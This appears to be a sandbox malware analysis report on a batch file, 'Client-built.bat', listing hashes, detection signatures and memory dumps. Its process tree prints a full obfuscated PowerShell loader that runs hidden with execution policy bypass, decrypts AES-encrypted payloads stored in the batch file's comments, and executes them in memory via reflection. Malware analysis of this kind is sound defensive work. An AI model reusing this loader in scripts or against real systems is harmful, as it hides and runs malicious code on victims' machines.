Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    24-12-2024 05:16

General

  • Target

    Client-built.bat

  • Size

    1.6MB

  • MD5

    a7aa482ba1ee0ea8d147d628d5a65f05

  • SHA1

    91e3a640c294a36697d9759a29072fdb4ab62346

  • SHA256

    79173bee83878cae44d9fc21fa85590711a92edc2d43caafb1350eb2800e72d7

  • SHA512

    a27dae71d85910609682cc324d4c4cf5c2e772f0a57209d2fbdc3e345538487d1262148b01b16df8cfb52c3c2a72ae04eb381f7dcf33d77c01d532d421e93a32

  • SSDEEP

    24576:tkjkTu1rkvOjvCsDjTprQ50JDzRj2umzby88rBFjB9a/In5PJBmpR4JRej08SG84:t859kWf+gEJe8yBBl+pIVX4

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p6NsuP0HTePf1oSATs8T+qB1p4ZrLbvAIaEmbH1pdsE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kxx6XOKog+oT5+kzMuvMwA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HWbzm=New-Object System.IO.MemoryStream(,$param_var); $PCqqJ=New-Object System.IO.MemoryStream; $ePDKE=New-Object System.IO.Compression.GZipStream($HWbzm, [IO.Compression.CompressionMode]::Decompress); $ePDKE.CopyTo($PCqqJ); $ePDKE.Dispose(); $HWbzm.Dispose(); $PCqqJ.Dispose(); $PCqqJ.ToArray();}function execute_function($param_var,$param2_var){ $GchUI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZfPjM=$GchUI.EntryPoint; $ZfPjM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$QJrfq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($aydBO in $QJrfq) { if ($aydBO.StartsWith(':: ')) { $CdaqF=$aydBO.Substring(3); break; }}$payloads_var=[string[]]$CdaqF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3048

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3048-4-0x000007FEF59AE000-0x000007FEF59AF000-memory.dmp

    Filesize

    4KB

  • memory/3048-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

  • memory/3048-6-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/3048-8-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/3048-10-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/3048-9-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/3048-7-0x0000000002790000-0x0000000002798000-memory.dmp

    Filesize

    32KB

  • memory/3048-11-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB

  • memory/3048-12-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

    Filesize

    9.6MB